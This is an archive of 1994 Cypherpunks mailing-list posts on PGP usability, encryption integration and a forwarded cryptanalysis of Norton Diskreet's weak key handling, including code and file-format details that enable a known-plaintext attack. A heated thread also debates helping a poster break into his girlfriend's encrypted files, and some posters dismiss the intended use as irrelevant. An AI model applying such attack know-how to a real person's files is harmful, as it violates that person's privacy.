My computer at work sits on my desk (in my locked office), has its own local disk, only I know the root password, I try to keep up with the latest security patches, and I keep most of my files in encrypted form under CFS. I'm the only regular user of my workstation, and while I'm at work I access it directly from the console. The network to which it is attached is AT&T's ``R&D Internet'', the same one that sits behind the firewall described in Cheswick and Bellovin's great new book. I probably have at least average system administration and general computer security skills, and I'm reasonably good about practicing what I preach. Sounds like a pretty secure machine from which to run PGP, right? I don't think so. While my machine's operating system is pretty self-sufficient, my own home directory sits on a remote file server administered by people who are good at and have time to perform essential services for me like taking backups. This means that, no matter how hard I try, it's impossible for me to be sure that none of my files have been tampered with. We use off-the-shelf NFS, which means that for all practical purposes anyone with access inside the firewall (that's about 50k people in my case) can replace any of my files. Furthermore, even though my office has a lock, I'm not the only person in the world with the key (Bell Labs escrows office keys, after all), and I've managed to pick the lock once or twice on days when I left my key at home. I really have no idea where my machine has been or what software I'm typing at when I run PGP. So where should I store my private key? Well, I could, as some have suggested, keep it on a floppy disk that I carry around with me everywhere I go, but first of all, that's too inconvenient. It also sounds dangerous in practice. A floppy disk is about the size of a US passport, and I've already lost two of those. 
That means I'd have to replicate the key somehow anyway, so I might as well rely on the reasonably well established backup procedure that protects me from loss of the rest of the files in my home directory. For all practical purposes, I have to assume that my secret key file is public. That leaves the passphrase to protect the secret key. According to Shannon, English text contains just over 1 bit per letter of real information. Even if we assume twice that to account for the added twists and turns of phrase I'm inclined to add to a passphrase, I just can't remember (or type) a phrase with anywhere near enough entropy to approach the level needed to do justice to even a little 512 bit RSA key. I think the simplest cryptanalytic attack against me would be to go after the passphrase-based encryption of the secret key file. (You'd need a way to enumerate the most likely keys based on a hashed passphrase, which is a problem not yet well studied in the unclassified literature. I suspect a solution is not out of reach of a determined adversary, however). An even simpler attack would be to break in to my machine and replace my copy of PGP (or my kernel, or my shell, or whatever) with one that records the passphrase as I type it. (No, I don't leave this as an exercise to the reader!) The next problem is with PGP itself. While I haven't looked carefully, it seems to be a well-engineered program, and it has a number of design features that I admire. However, I think the basic model it implements sits at too high a level, making it inherently unreliable for really sensitive traffic. It's just too hard to use. (Most of the problems could be fixed by pushing things to a lower level, and I understand a number of people are working on this). 
In particular, I'm forced to have too much involvement in each PGP operation, and it's just too easy for me to do stupid things like:

 - encrypting messages with the wrong public key
 - sending the cleartext file instead of the ciphertext file
 - leaving the cleartext file around in an unprotected file system
 - including the passphrase in the message (especially when your fingers are so used to typing it all the time...)
 - forgetting to use PGP at all
 - typing a passphrase over a network connection (especially easy when you've got several windows open on several machines). Systems that use hardware keys (smartcards, etc) are less vulnerable to this

I've done each of these dumb things at least once, and probably others as well.

Don't get me wrong - I advocate the use of strong encryption as much as the next nerd. I'm just concerned about focusing so narrowly that we lose sight of the larger security picture. Perry Metzger once made reference to cryptographic "size queens" who worry about key size and nothing else - it's a phrase that rings true.

There's something to be said for systems that offer security parameters that provide about the same strength across various attacks. DES is a good example - a 128 bit key DES could be designed that is at least as secure as the current 56 bit version - by at least few bits. The engineering triumph is that the "advertised" DES security parameter - the key size - tells close to the truth about the overall security of the system. (Of course, in RSA-based systems, there's an added variable - advances in factoring - that may make it prudent to include a significant margin for error, especially for keys that must retain their strength over time).

I have a 1024 bit key at home.
-matt From lbilling at interserv.com Fri Dec 23 14:44:02 1994 From: lbilling at interserv.com (Al Billings) Date: Fri, 23 Dec 94 14:44:02 PST Subject: GUI: PGP vs novices Message-ID: <199412232241.AA20845@relay.interserv.com> >The product works at the Windows Sockets layer, intercepting mail as it is >sent from the mail application to the SMTP host, and performing the above >crypto related functions based on text placed at the top of the mail message.
[ Some Deleted ]

>A major complication that I've come up against is installation. Somehow
>I've got to provide a painless way of discovering the Winsock stack in use
>on a machine, and installing my WINSOCK.DLL so that it gets loaded instead
>of the real one (which my software then loads on its own and intercepts
>calls to.)
>This is really easy to do manually when one has knowledge of such things; it
>is a major pain in the ass to come up with a way of doing this that doesn't
>require the user to know anything about Windows Sockets or DLL's or path
>variables, etc.

There is also the problem that a number of applications (such as Internet in a Box) require their own Winsock to make connections to the Internet. If you replace the Ibox winsock with another, when you run the programs they will no longer call the dialer to dial into the Internet. I believe the same holds true for Trumpet.

Wassail, Al Billings

From jcorgan at scruznet.com Fri Dec 23 15:03:12 1994
From: jcorgan at scruznet.com (Johnathan Corgan)
Date: Fri, 23 Dec 94 15:03:12 PST
Subject: GUI: PGP vs novices
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

>There is also the problem that a number of applications (such as Internet in
>a Box) require their own Winsock to make connections to the Internet. If you
>replace the Ibox winsock with another, when you run the programs they will
>no longer call the dialer to dial into the Internet. I believe the same
>holds true for Trumpet.

I only have familiarity with the commercial Netmanage Chameleon Winsock implementation. Someone else had let me know about this potential difficulty. Apparently some Winsock stacks only provide a WINSOCK.DLL for 3rd party compatibility, i.e., their own applications talk to proprietary hooks into their stack for performance or other reasons. Netmanage's products do both; they perform their network I/O through WINSOCK.DLL, but also use a variety of shared library functions supplied with the rest of the stack.
In this case, my WINSOCK.DLL shim works fine. Remember, I'm not replacing a given implementation's DLL, just intercepting and passing through calls to it. So as long as a mail application uses exclusively standards based Windows Sockets API calls _to perform network I/O_, my product should work. YMMV, of course :) ======================================================================= Johnathan Corgan "Violence is the last refuge of the incompetent" jcorgan at netcom.com -Isaac Asimov PGP Public Key: http://www-swiss.ai.mit.edu/~bal/pks-toplev.html Or send email to: pgp-public-keys at pgp.ai.mit.edu Subj: GET jcorgan ======================================================================= -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLvtW4k1Diok8GKihAQEjngP7BRUatySeVmJ2SvDLycMYtCTh5obyvAZ4 nLxhP69VUCs1LprfMVWIsL46WsS/neiVpf3Wor0T/kzLrb0s/0m3a8+GQhdz7te9 NRQbJGfJG57KR1yCBHMk2/HSDjVR0daCQVQCcJFTqw2aOXfWo6x20ZZqQvR1N2Ju U57UIG9BRG4= =Xm6z -----END PGP SIGNATURE----- From greg at ideath.goldenbear.com Fri Dec 23 15:10:26 1994 From: greg at ideath.goldenbear.com (Greg Broiles) Date: Fri, 23 Dec 94 15:10:26 PST Subject: Norton encryption and privacy Message-ID: <199412232307.AA05754@ideath.goldenbear.com> -----BEGIN PGP SIGNED MESSAGE----- This was posted to USENET several months ago. Diskreet is a PC-based device driver which creates a virtual encrypted partition on a normal hard disk partition. I don't know if they use the same algorithms in Norton Encrypt or not. Snooping in other people's files still sucks. 
-----
From: pgut1 at cs.aukuni.ac.nz (Peter Gutmann)
Newsgroups: sci.crypt,comp.security.misc
Subject: Norton's [In]Diskreet: An update
Followup-To: sci.crypt
Date: 13 Jul 1994 17:21:57 GMT
Organization: University of Auckland
Lines: 96
Sender: pgut1 at cs.aukuni.ac.nz (Peter Gutmann)
Message-ID: <3017rl$8j4 at ccu2.auckland.ac.nz>
NNTP-Posting-Host: cs13.cs.aukuni.ac.nz
X-Newsreader: NN version 6.5.0 #7 (NOV)

Last November I picked apart part of the Diskreet encryption program and posted what I found to this group. By some miracle I had a bit of spare time this afternoon, so I've had another quick look at it. The result is some more information on the proprietary encryption algorithm and the file format it uses.

First, a recap of what I presented last time:

The key setup process is very badly done. The front-end gets a password in the range of 6..40 characters, and converts it to all-uppercase. Then it packs it into a struct along with a collection of other information and passes it to the DES library used by Diskreet. The first thing this does is take the password and reduce it to 64 bits by cyclically xor-ing the full-length password into an 8-byte buffer initially set to all zeroes, ie:

    /* xor-fold the password into the 8-byte buffer */
    for( index = 0; password[ index ]; index++ )
        buffer[ index % 8 ] ^= password[ index ];

It then performs what looks like a standard DES key schedule with the 64-bit output from this operation. This creates 128 bytes of subkeys for encryption and 128 bytes of subkeys for decryption. These are either used for the proprietary encryption method or for DES encryption.

Here's a rundown of the proprietary method: All operations are performed on 16-bit words. byteSwap() performs an endianness-reversal on a word. Chaining is performed by xor-ing in the previous ciphertext word. The keyTable is the 256-byte array of DES subkeys, treated as an array of words.

    data[ -1 ] = 0x1234;                  /* chaining value for the first word */
    index = sectorNo % 128;
    index = keyTable[ index ] % 128;      /* starting offset into the key table */
    for( i = 0; i < SECTOR_SIZE / 2; i++ )
        {
        value = keyTable[ index++ ] + data[ i ];
        byteSwap( value );
        value ^= data[ i - 1 ];           /* chain in the previous ciphertext word */
        data[ i ] = value;
        index %= 128;
        }

As can be seen, a known-plaintext attack will recover the (expanded) encryption key without too much trouble - it's just a repeated addition of a 128-word array to the data, with the previous word xor'd in for chaining purposes. The xor and byteSwap are basically nop's and can be stripped off without any problems, revealing the key stream used to encrypt the data. Since encryption is done by sectors, the same key data is used twice for each sector.

How do we perform a known-plaintext attack? It's quite simple actually, since Diskreet itself provides us with about as much known plaintext as we need. The file format is:

    General header

    BYTE[ 16 ]      "ABCDEFGHENRIXYZ\0"
    char[ 13 ]      fileName
    LONG            fileDate
    BYTE            fileAttributes
    LONG            fileSize
    LONG            file data start
    BYTE[ 16 ]      0

    File data

    BYTE[ 32 ]      0

    Padding to make it a multiple of 512 bytes

Everything from the 16-byte magic value to the end of the file is encrypted in blocks of 512 bytes. The proprietary scheme will directly reveal its key stream on the 16-byte check value, the 16 bytes of zeroes at the start, and the 32 bytes (minimum) of zeroes at the end of the data.

Interestingly enough, the presence of the 16-byte known plaintext right at the start would tend to confirm the rumours that that's one of the criteria for having an encryption program approved by the NSA. The plaintext also gives us the name of one of the programmers involved.

In my previous posting I said:

The encryption itself uses DES in CBC mode with a fixed IV. This means that, in combination with the tiny key space, it's possible to create a precomputed collection of plaintext/ciphertext pairs and "break" most encrypted files by reading the results out of a table.

The 16-byte known plaintext makes this attack a certainty.
In addition, if two pieces of data are encrypted with the same key, one with the proprietary method and one with DES, the DES key can be recovered from the proprietary-encrypted data and used to decrypt the DES-encrypted data. Again quoting from my previous posting: In summary, there may be a correct DES implementation in there somewhere, but it doesn't help much. [In]Diskreet will stop a casual browser, but won't give you any protection at all against any serious attack. Peter. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLvtYIH3YhjZY3fMNAQHeYAQAmNUJA9TfNQAJ+5jwbGDFbFtgjFVg1Gyn /RgAou3GuQvVRpmTqurVUWN8wzUCluj6ouU39ct2DEoyMHLFgkCdTcxDcSIS8Tpz yb9yPkI2Sr2uJ8dE5kuN29v0D3Nq4vW3a8jhRi2oJC3WbAaWYuoCQees8/wxfOfy 4bDPouwTBYc= =Rx5b -----END PGP SIGNATURE----- From ddt at lsd.com Fri Dec 23 15:21:31 1994 From: ddt at lsd.com (Dave Del Torto) Date: Fri, 23 Dec 94 15:21:31 PST Subject: B-PGP: news/requests Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Note: I'm meta-prefixing this "B-PGP" to indicate the "Beginner-PGP" thread. At 10:37 am 12/21/94, bshantz at spry.com wrote: >It is my own personal opinion that in order for crypto to truly become >mainframe, the software manufacturers of internet connectivity packages must >integrate crypto into the applications. [elided] FYI, any of you who haven't heard should be pleased to know that Steve Dorner is working with Zig Fiedorowicz on integrating ViaCrypt PGP/Mac functions into Eudora (on the Mac, at least, which is a good starting point). This is a major step forward, since Eudora is so POPular :) and this could certainly increase sales of ViaCrypt's s/w as well. In the meantime, I'm looking at the AppleEvent scripts that have been made public and will make comments on them soon. Anyone who's up-to-date on current Mac or Windows version development (Hal Hildebrandt?) is encouraged to contact me, per Phil's request. 
I just want to make sure everyone gets what they need and that the left hand knows what the right hand is doing, etc. I'll set up an FTP directory "somewhere" for a central repository if anyone feels it's necessary (location to be announced elsewhere). BTW, I'm starting work on a Beginner's PGP-FAQ and would appreciate any question/answer pairs anyone would care to submit. Please keep them simple: they are aimed at an AOL-ish user level. The final document should be extremely non-technical, non-threatening and about three pages long maximum. In it, I will describe the History of the Entire Cryptographic World in 4000 words or less. :) I'm calling the 3-Minute Shakespeare Troupe next week for pointers on how to accomplish this... Speaking of AOL, does anyone know anyone on the current Internet development team there? I used to exchange email with some internet-oriented guys there back in '90-'91 but I wonder if anyone is in current contact - I'd like to discuss the possible integration of PGP into the AOL client software. That would effectively put PGP in a couple of million users hands PDQ. With all the bidness activity there of late, it seems to me there's a need that could be filled quite nicely. >In order to bring crypto to the masses, we have got to convince people that >it is necessary. We also must make it"second nature". It sure is nice to have >a menu option or a toolbar button that will encrypt plaintext automatically. >Key management and some of the "high tech" (I know, for us it's nothing, but >for my dad who just bought a computer and doesn't understand the difference >between click, double click, and drag, crypto is a really high tech thing >just in itself.) Notice Brad didn't even mention his MOM yet. I once tried to explain PGP to my Mom. "That's very nice, dear," was about the breadth of her reaction, but I still put a box on her desk and set her up with a key, even if she won't use it yet (ever? hey, she's a mom, Okay?). 
Now, if it was a real point-n-click maneuver, it might have a snowball's chance in hell with her, but until then...

>things of crypto should not be directly handled by the user.
>(Optional
>of course. On a privacy level, the user should have full control.

Indeed. I'm hoping the upcoming versions of mainstream PGP (Mac/Win) will allow for a bit more modularity in the apps. I.e. it would be nice if you could "plug in" various functions, so that you could build up the app's features as a user gained more sophistication, but this may be way beyond the v3.0 scope. More on this idea later, as it more directly relates to system software extensions than PGP application stuff.

>But give the user a break...if the software is secure..as such...so is the
>user's privacy.)
>
>You will notice that this message is not signed. That's because in order to
>sign it, I would need to save my message, hop out to a DOS box, PGP encrypt
>it, hop back to my mail program and insert the encrypted mail as a text file.
>That's enough to discourage the average user. This is pretty much what Tim
>May was talking about when he discussed why he doesn't sign his messages.
>It's not that he couldn't... it's just not practical for him. It's not
>really practical for me either, but I do it when I feel it's necessary.
>
>The only way to make crypto practical is to basically hide the technical
>side from the user and make it easy.

Let me describe briefly for you all (and everyone is encouraged to type up a similarly brief log of what they do on their machines so we have a UI comparison table) what I deal with when I encrypt a msg on the Mac. Keep in mind that I have worked very hard to streamline the process as much as possible, and that this is before installing the AppleEvent scripts. It's not difficult for me, but for someone without a clue... well, they get two steps in, stare at the screen and eventually bag it.

    type msg body (in Eudora).
    select text
    copy to Mac clipboard (system)
    switch to PGP with macro
    Encrypt (or Sign) menu command
      [PGP reads the clipboard here, a wonderful improvement thanks to ...Zig?]
    enter passphrase
      [PGP outputs encrypted text to clipboard, wipes temp file]
    macro back to Eudora.
    paste clipboard back into msg body

Now, all of this is easily scriptable: I once did it with a long complicated macro, but it was s l o w, so I bagged that idea - it didn't even use system level events. I'm hoping the new AE scripts will handle most of this, but it SHOULD all be done in the application layer by Eudora with direct calls to PGP in the bg (see above annc re Steve Dorner), which is the current direction. Let's hope ViaCrypt's new AE support will allow for this (Zig? hello?).

IMPORTANT: Anyone currently working on an PGP versions is hereby requested to mail me regarding the coordination of development efforts. Mail Phil with questions about this.

ALSO: There will/should be a group discussion at the upcoming physical meeting on the 14th which both Phil and I will be attending. Please bring your keys/laptops/floppies for signing.

Over and out, dave
________________________________________________________________________
Speaking of "term limits," hasn't Rush Limbaugh gotten enough attention?

-----BEGIN PGP SIGNATURE-----
Version: 2.6ui

iQCVAgUBLvtabKHBOF9KrwDlAQFYkAQAiKcjZx5iCzn0CLIBY5/TzVOY8sl7Jclo
v6MSPdNdU3ONTBLtDlI3HbSnq/SqGyJxkgxex7aLaICwB+RUsE2TMnJ2PBXD1W0T
48eqQZT3IhT35gEfV3RQnYllIS4mhEWxzq8KFMPwdCjlNrF794TqZFgBadWZL+LR
4hXhnrTuB5A=
=/bL0
-----END PGP SIGNATURE-----

From jcorgan at scruznet.com Fri Dec 23 18:54:30 1994
From: jcorgan at scruznet.com (Johnathan Corgan)
Date: Fri, 23 Dec 94 18:54:30 PST
Subject: CERN HTTPD proxy info
Message-ID:

Could someone please post the address/port for the HTTP proxy at CERN?
Thanks, Johnathan

From unicorn at access.digex.net Fri Dec 23 20:28:59 1994
From: unicorn at access.digex.net (Black Unicorn)
Date: Fri, 23 Dec 94 20:28:59 PST
Subject: Breaking into girlfriend's files
In-Reply-To: <9412231452.ZM19768@wiley.sydney.sgi.com>
Message-ID:

On Fri, 23 Dec 1994, Ian Farquhar wrote: > Date: Fri, 23 Dec 1994 14:52:06 -0500 > From: Ian Farquhar > To: cypherpunks at toad.com > Subject: Re: Breaking into girlfriend's files > > On Dec 22, 9:46pm, Mark Terka wrote: > > GROAN! What the hell is this list about anyway?????? I think we are losing > > perspective about encryption, privacy etc etc... > > > Putting it quite simply, the individual was asking about how to make an > attack > > on an opponent. Whether that opponent is a girlfriend, spouse, competitor or > > terrorist group, who cares? Lets save the sermonizing for Ann Landers...what > > state the relationship is irrelevant. > > What a load of amoral rubbish. By whose standard? Yours? > > Cypherpunks is a group whose members believe in the application of > technology to PROTECT privacy, not to violate someone else's. > Once you assume that capability implies right, you're on very > shaky moral ground, but that is exactly what you are saying in this > post. I find that position repellent, and I would be very surprised > and not a little disappointed if you find many others here who felt > the same way. Who the hell are you to define the position of cypherpunks? Who the hell are any of us to do this? I guess I suffered from the silly idea that as a whole, the members of the list would not put short term morality before the long term goal. It seems there are those who disagree with me. I would offer the following: While it may be that Joe Break-Into-Girlfriend's-Files may or may not be justified, that is not ours to judge. It is simply for the crypto non-challenged to comment on the security or lack thereof of a given system.
As soon as this list turns into a pile of bleeding heart liberals, anxious to embroil themselves in the personal matters of others, it has failed. I cannot believe that people on this list, those who claim to be interested in the preservation of privacy, would support the proposition that knowledge about the strength or weakness of a given system should be suppressed. What the hell is that? I guess no one who supports this position has ANY business >WHATSOEVER< in pointing out that digital cellular has a lower level of security than it is advertized as, or that Clipper is compromised. Who the hell are you people to second guess? Back to security through obscurity I suppose. How typical. What a perversion. Freedom of information, except where that information may violate principles we define, and enforce. Strong crypto for all, except those who would use weak systems, those we will keep in ignorance, and refuse to educate in any manner. Denouncement of insecure crypto security, unless of course, it might tend to offend someone, the definition of offense we shall, of course, define. What a load of sanctimonious crap. We will decide what's good for you, and what you are allowed to know. Disgusting. Get off this list, you belong on alt.codependency.recovery, or alt.bleeding.liberal. > > I bet the poster would have gotten a more sympathetic response if he said he > > had gotten his hands on a diplomatic cable.... I submit that the response should have been the same regardless of the nature of the material. Which is it going to be? 1> Q: "How do you attack X?" A: "Y" or 2> Q: "How do you attack X?" A: "Realistically X should not be attacked, because to allow the widespread lack of confidence in X will destroy society as we know it, and anyhow it's nasty." > Possibly. IMO, what the original requester was asking for was so > repulsive and immature that the responses so far have been mild. Who are you to judge? Take it to alt.partronizing.jerk > > Ian.
> > -uni- (Dark) 073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est 6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa - wichtig! From unicorn at access.digex.net Fri Dec 23 20:40:04 1994 From: unicorn at access.digex.net (Black Unicorn) Date: Fri, 23 Dec 94 20:40:04 PST Subject: Breaking into girlfriend's files In-Reply-To: Message-ID: On Fri, 23 Dec 1994, Dave Horsfall wrote: > Date: Fri, 23 Dec 1994 15:41:49 +1100 (EST) > From: Dave Horsfall > To: cypherpunks at toad.com > Subject: Re: Breaking into girlfriend's files > > On Thu, 22 Dec 1994, Mark Terka wrote: > > > GROAN! What the hell is this list about anyway?????? I think we are losing > > perspective about encryption, privacy etc etc... > ^^^^^^^ > You said it. [Watch now how the author perverts the notion of privacy...] > > > Putting it quite simply, the individual was asking about how to make an attack > > on an opponent. Whether that opponent is a girlfriend, spouse, competitor or > > terrorist group, who cares? Lets save the sermonizing for Ann Landers...what > > state the relationship is irrelevant. > > And *HE* gave the reason - he wanted go rifling through his girlfriend's > private files. And here I was, thinking that this list was about "better > privacy through cryptography" - I must have subscribed to alt.2600 by > mistake... Come to think of it, that's a better place for the original > query... And what has the author done here, but involve himself in the affairs of our poster requesting information on Norton...? Some privacy he afforded the would be norton breaker, or even norton breaker's girlfriend. Sure, Norton breaker should have kept his mouth shut, but a small comment at the end of a technical post detailing norton should have taken care of this. Mind your own business next time smart guy. > > The gentleman asked a question regarding a standard cryptographic problem... 
> > how you can intercept and interpret encrypted information, either in theory > > in practice. To make judgement calls is WAY out of line and a hell of a bad > > precedent for this group. > > Read it again - he specifically wanted to sneak into his partner's files; > that is a clear invasion of privacy. How much context do you have here? I submit again, you should just mind your own business. I hardly accept your judgement as to when information should or should not be released. Jeeze - I thought a Yank would have > understood this... > Not all of us are "Yanks" my friend. > > I bet the poster would have gotten a more sympathetic response if he said he > > had gotten his hands on a diplomatic cable.... > > And would you have been just as sympathetic if somebody wanted to rifle > YOUR files? Had I encrypted with Norton encrypt? I would have been deserving of whatever attack ensued. When the hell are people going to take responsibility for themselves. Who are you to assume another's responsibility for their privacy? What will happen when your paternalistic regime is on vacation? Let's make a government crypto subsidy eh? Obviously people are such idiots that they all need government to supply them with crypto. I guess you'd be the head of standards? Deciding when and who gets which methods? > > Oh boy! Pretty soon we will have this list as "cypherpunks giving advice to > > the lovelorn..."!!! Lets cut the crap, stick to the problem at hand and > > offer solutions to what the participants of the list know best, namely the > > the use and analysis of cryptographic problems. > > That has nothing to do with it - person A wanted advice on how to invade > person B's privacy (he presumably doesn't have the guts to just ask her). > Sorry, but privacy works both ways - she's entitled to it just as much > as anybody else. I see, and if I asked how to eavesdrop on digital cellular, your position would be that I should not know.
Obviously I intend, or could distribute such information to thousands who might violate the privacy of millions. Funny how the general disclosure doesn't bother you, but the specific disclosure, one which affects no more than perhaps three people, does. I suggest you get your perspectives in order. > -- > Dave Horsfall (VK2KFU) | dave at esi.com.au | VK2KFU @ VK2AAB.NSW.AUS.OC | PGP 2.6 > Opinions expressed are mine. | E7 FE 97 88 E5 02 3C AE 9C 8C 54 5B 9A D4 A0 CD > -uni- (Dark) 073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est 6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa - wichtig! From unicorn at access.digex.net Fri Dec 23 20:45:11 1994 From: unicorn at access.digex.net (Black Unicorn) Date: Fri, 23 Dec 94 20:45:11 PST Subject: Breaking into girlfriend's files In-Reply-To: <199412230455.XAA07179@bb.hks.net> Message-ID: On Thu, 22 Dec 1994, L. McCarthy wrote: > Date: Thu, 22 Dec 1994 23:55:01 -0500 > From: L. McCarthy > To: cypherpunks at toad.com > Subject: Re: Breaking into girlfriend's files > > -----BEGIN PGP SIGNED MESSAGE----- > > Black Unicorn writes: > > If she gets burned using norton encrypt, perhaps she'll take the time to > > learn about real encryption. (I assume Norton's is trash) > > Short term privacy loss perhaps, but long term gain. > > This sounds to me rather like saying: > "If the American public gets burned by accepting Skipjack as the crypto > standard, perhaps they'll take the time to learn about real encryption." No, but close. If the American people accept Skipjack crypto, they deserve every bit of invasion they get for their laziness. Educate yourself or perish. The day of government provided intelligence should be long past. What a crock of shit. > > I prefer the version where the American public doesn't get burned in the first > place. If Clipper has to be adopted before the public will learn about real > encryption, why are we bothering to try to promote it now ? 
Shouldn't we be > backing Clipper wholeheartedly, to teach 'em a lesson ? > America, the country that is so rich, we can afford to subsidize the lazy and punish the prosperous. (Apologies to the sig I stole that from...) > [...] > > The more I think about the above, the more I wonder if those on the list > > have conflicting goals, that is, absolute privacy by agreement. Are we > > really that naive? > > I have ideals, yes. My deepest condolences if you don't have any. > I'm quite pleased I don't have even a trace of your ideals, thank you. Though I suppose it's typical you should think yours superior to any out there. Sanctimonious liberal who would spend my money to educate the lazy, what else would I expect. > - -L. Futplex McCarthy > > > - --- > [This message has been signed by an auto-signing service. A valid signature [...] -uni- (Dark) 073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est 6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa - wichtig!

From nobody at jpunix.com Fri Dec 23 22:22:13 1994
From: nobody at jpunix.com (Anonymous)
Date: Fri, 23 Dec 94 22:22:13 PST
Subject: DDJ article on RC4
Message-ID: <199412240621.AAA24808@jpunix.com>

Putting the Genie Back in the Bottle

What had all the earmarkings of a major-league food fight sure didn't take long to dry up and blow away. Triggering the flap was an internet posting of source code that implemented the RC4 algorithm, an act that knocked on all kinds of legal doors - trade secrets, Internet-host liabilities, reverse engineering, shrink-wrap licensing, export control. You name it. The problem is that RC4, the block-cipher encryption algorithm at the heart of RSA Data Security cryptography, is protected as a trade secret. But some on the net say the online posting let the genie out of the bottle - RC4 was made public and available for anyone to use, RSA's claims notwithstanding.
RSA counters that the company used trade-secret law simply to protect its intellectual property, and there's never really been any "secret" about the algorithm. Anyone willing to sign a nondisclosure agreement acknowledging RC4's trade-secret status could have ready access to the reference and source code. Among companies which have licensed RC4-based tools from RSA are Microsoft, Novell, Apple, and Lotus, all of which distribute RC4-based binary files in shrink-wrapped applications. You can imagine the furor when an unidentified person (or persons) used an anonymous remailer to post worldwide - first to a cryptographer mailing list, then to a newsgroup - source code that was supposedly RC4. Subsequent testing by programmers and cryptographers confirmed that the code was indeed compatible with "real" RSA RC4 code. RSA Data Security responded by calling in everyone from the U.S. Customs Service to the Federal Bureau of Investigation. In a strongly worded warning on the net, RSA said it considered the posting "a violation of law ... [and] ... a gross abuse of the Internet." If the person(s) who posted the source code had in fact signed an RSA nondisclosure agreement, the issue seems pretty clear-cut. They broke the law, not to mention RSA's trust. If, as some claim and RSA disputes, the code was reverse-engineered from object files in off-the-shelf software, then the law was probably broken - unless RSA and other vendors decide to test the strength of highly questionable and likely unenforceable shrink-wrap licenses that try to prohibit disassembly/decompilation. Of course, it just might be that some cryptographer derived the algorithm after examining the key, plaintext, and ciphertext. And there's even the chance, albeit unlikely, that a dumpster diver ran across discarded copies in RSA's corporate wastebasket. Questions concerning the legal status of copyrighted material that's made freely available (illicitly or otherwise) on the Internet also have to be tackled. 
Can Internet hosts be held accountable for anonymous postings of protected material? And don't forget, RC4 isn't just any software - it's ENCRYPTION software. Is posting such software online worldwide the same as exporting it? If so, the State Department might have a thing or two to say.

The end result is that RC4 code is available on ftp sites worldwide, ready and waiting for you to use it. But if you grab it off the net, can you use it without RSA's permission? For the time being, the answer probably depends on which lawyer you ask.

Speculation aside, the RC4 controversy explains why many developers are protecting their intellectual property with patents instead of copyrights. Gray areas like RC4 would be black and white if RC4 had been patented. But then patenting would also mean that RC4 would have been public in the first place.

The immediate impact may be on RC5, the next-generation version of RC4, which Ron Rivest describes in this issue. In part because of the RC4 controversy, Ron and RSA Data Security are considering patenting RC5, a departure from their original plans. At one point, RC5 code and reference was to be distributed free-of-charge for noncommercial use. Small businesses could license the material for $500, and large businesses, for $1000. All proceeds were to go to RSA Labs - not RSA's bottom line - to fund further R&D. This could still happen even if RSA patents RC5, but the licensing fees would be higher to offset the patent costs.

Likewise, there could be some repercussion in terms of exporting RC4-based systems. For the past couple of years, vendors have been allowed to export software that uses RC4 short-key encryption. The State Department could change this since RC4 is no longer secret.

As for the multitude of legal questions, nothing concrete will immediately come of the RC4 brouhaha, unless those responsible for posting the code are identified.
Existing RC4-based systems weren't compromised and may have benefited, since we can now see that system backdoors don't exist. What we're left with are more questions, fewer answers, and the suspicion that one of these days a big shoe is going to fall on software and intellectual-property rights - one that won't make anyone completely happy.

Johnathan Erickson
editor-in-chief

From pstemari at erinet.com Fri Dec 23 22:25:28 1994
From: pstemari at erinet.com (Paul J. Ste. Marie)
Date: Fri, 23 Dec 94 22:25:28 PST
Subject: Attacking Norton Encrypt
Message-ID: <9412240617.AA02276@eri>

At 09:52 PM 12/23/94 IST, rishab at dxm.ernet.in wrote:
>
>Regarding the simple question about Norton Encrypt's security (and ignoring
>the alt.relationship-counsellor interlude), I believe Norton uses DES (for
>'maximum security' or a 'fast proprietary' method for convenience. I don't
>think it has the usual errors (password stored in ciphertext etc), but a
>brute force attack on DES is beyond the means of most Norton users IAC.

Perhaps, but if the earlier post is accurate about it mapping UC to lc and only accepting 8 characters of password, you've gone from a 56 bit keyspace to a ~38 bit keyspace. A dictionary attack is certainly feasible--I don't recall what speeds have been achieved for brute-forcing DES lately.

--Paul J. Ste. Marie

From jonathon.fletcher at psych.stir.ac.uk Fri Dec 23 22:42:55 1994
From: jonathon.fletcher at psych.stir.ac.uk (Jonathon Fletcher)
Date: Fri, 23 Dec 94 22:42:55 PST
Subject: Breaking into girlfriend's files
Message-ID: <9412240641.AA23806@oss.stir.ac.uk>

It seems a little strange that cypherpunks are arguing over whether or not to disclose information about a (supposedly) cryptographic product to a certain individual.

Let's relate this to other examples of restricting cryptographic information - can anyone think of any groups or organisations that do this ?
Okay, now we've thought of a couple, let's compare reasons (left as exercise for the reader) for the restriction of this information and our opinions on those restrictions.

Have I made my point ? Should we change the infamous slogan to: "Cypherpunks is watching you".

Someone asked a technical question about cryptography, other list members answered it. Can we now get on with more relevant matter ?

-Jon

--
Jonathon Fletcher, j.fletcher at stirling.ac.uk

From jamesd at netcom.com Sat Dec 24 00:01:46 1994
From: jamesd at netcom.com (James A. Donald)
Date: Sat, 24 Dec 94 00:01:46 PST
Subject: Breaking into girlfriend's files
In-Reply-To:
Message-ID:

On Fri, 23 Dec 1994, Ian Farquhar wrote:
> > What a load of amoral rubbish.
> On Fri, 23 Dec 1994, Black Unicorn wrote:
> By whose standard? Yours?

Well I guess Black Unicorn's standards are not such that one should entrust secrets to him.

---------------------------------------------------------------------
We have the right to defend ourselves and our property, because of the kind of animals that we are. True law derives from this right, not from the arbitrary power of the omnipotent state.
James A. Donald
jamesd at netcom.com

From jamesd at netcom.com Sat Dec 24 00:12:25 1994
From: jamesd at netcom.com (James A. Donald)
Date: Sat, 24 Dec 94 00:12:25 PST
Subject: Breaking into girlfriend's files
In-Reply-To: <9412240641.AA23806@oss.stir.ac.uk>
Message-ID:

On Sat, 24 Dec 1994, Jonathon Fletcher wrote:
>
> It seems a little strange that cypherpunks are arguing over whether or
> not to disclose information about a (supposedly) cryptographic product
> to a certain individual.

The criticism was that the proposed use of the knowledge was wrong -- not that the knowledge was wrong.

Then there was a larger debate -- is morality a threat to liberty, or is coercion the only serious threat to liberty.
